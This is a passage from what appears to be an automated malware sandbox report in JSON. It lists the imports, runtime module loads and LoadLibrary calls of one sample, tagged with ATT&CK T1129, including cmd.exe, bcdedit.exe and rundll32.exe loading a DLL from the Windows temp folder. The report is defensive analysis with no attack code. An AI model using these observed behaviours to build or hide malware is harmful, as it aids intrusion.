\"0c000d00e04ce66b@IPHLPAPI.DLL\"\n \"15001600c03ee66b@ADVAPI32.dll\"\n \"0e000f00703fe66b@ADVAPI32.dll\"\n \"0e000f00cc3fe66b@ADVAPI32.dll\"\n \"11001200b447e66b@ADVAPI32.dll\"\n \"110012004848e66b@ADVAPI32.dll\"\n \"120013008c48e66b@ADVAPI32.dll\"\n \"12001300e448e66b@ADVAPI32.dll\"\n \"14001500386ee66b@ADVAPI32.dll\"\n \"14001500506ee66b@ADVAPI32.dll\"\n \"14001500686ee66b@ADVAPI32.dll\"\n \"17001800806ee66b@ADVAPI32.dll\"\n \"0d000e00986ee66b@ADVAPI32.dll\"\n \"11001200a86ee66b@ADVAPI32.dll\"\n \"11001200bc6ee66b@ADVAPI32.dll\"\n \"0d000e003449e66b@shell32.dll\"\n \"0d000e00b049e66b@shell32.dll\"\n \"0f001000fc6fe66b@ADVAPI32.dll\"\n \"140015003c70e66b@ADVAPI32.dll\"\n \"140015005470e66b@ADVAPI32.dll\"\n \"0c000d009c70e66b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77e10000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"GDI32.DLL\" at base 778b0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711c0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"KERNEL32\" at base 77e30000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"VERSION.DLL\" at base 75060000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 64ca0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"USER32.DLL\" at base 77950000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"MSCOREE.DLL\" at base 6c290000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"PSAPI.DLL\" at base 77a20000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"RPCRT4.DLL\" at base 760a0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"KERNEL32.DLL\" at base 77e30000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63890000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"OLE32.DLL\" at base 77480000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"CRYPTBASE.DLL\" at base 75ac0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74710000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6c6f0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6b7e0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 62e30000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 6b630000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 61fc0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"ADVAPI32.DLL\" at base 77a30000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"UXTHEME.DLL\" at base 74710000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 617a0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 69dc0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 61020000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6c120000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"NTDLL.DLL\" at base 77cc0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"SHELL32.DLL\" at base 76760000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77880000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"PROFAPI.DLL\" at base 75bd0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"BCRYPT.DLL\" at base 756e0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"CRYPTSP.DLL\" at base 755d0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75360000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"IMM32.DLL\" at base 77e10000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"COMCTL32.DLL\" at base 72350000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"GDIPLUS.DLL\" at base 744e0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 744e0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77e30000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"C:\\NTDLL.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"SSPICLI.DLL\" at base 75a50000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\RASAPI32.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"RASAPI32.DLL\" at base 6ca50000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"RTUTILS.DLL\" at base 739d0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77880000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77880000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"WS2_32.DLL\" at base 77ae0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75590000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 750f0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75580000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"RASMAN.DLL\" at base 72550000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WINHTTP.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"WINHTTP.DLL\" at base 71f60000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"SHLWAPI.DLL\" at base 775e0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"CREDSSP.DLL\" at base 75290000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"IPHLPAPI.DLL\" at base 73f20000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73e30000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"DHCPCSVC.DLL\" at base 73db0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"NSI.DLL\" at base 778a0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"CFGMGR32.DLL\" at base 75d00000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"OLEAUT32.DLL\" at base 766c0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77880000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75b60000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77880000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\IPHLPAPI.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"DNSAPI.DLL\" at base 75450000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"RASADHLP.DLL\" at base 720f0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73e90000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\SECUR32.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"SECUR32.DLL\" at base 758f0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 753d0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"NCRYPT.DLL\" at base 75700000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 752a0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\CRYPT32.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"CRYPT32.DLL\" at base 75dd0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CRYPT32.DLL\" at base 0\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"USERENV.DLL\" at base 75bf0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"GPAPI.DLL\" at base 751a0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"PROPSYS.DLL\" at base 74750000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"COMCTL32.DLL\" at base 74a90000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"APPHELP.DLL\" at base 75a70000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"CLBCATQ.DLL\" at base 76010000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a1f0000\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" loaded module \"SETUPAPI.DLL\" at base 77b20000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711c0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77e30000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a70000\n \"bcdedit.exe\" loaded module \"GDI32.DLL\" at base 778b0000\n \"bcdedit.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77e10000\n \"bcdedit.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711c0000\n \"bcdedit.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bcdedit.exe\" loaded module \"KERNEL32\" at base 77e30000\n \"bcdedit.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bcdedit.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc60000\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc60000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711c0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rundll32.exe\" loaded module \"KERNEL32\" at base 77e30000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 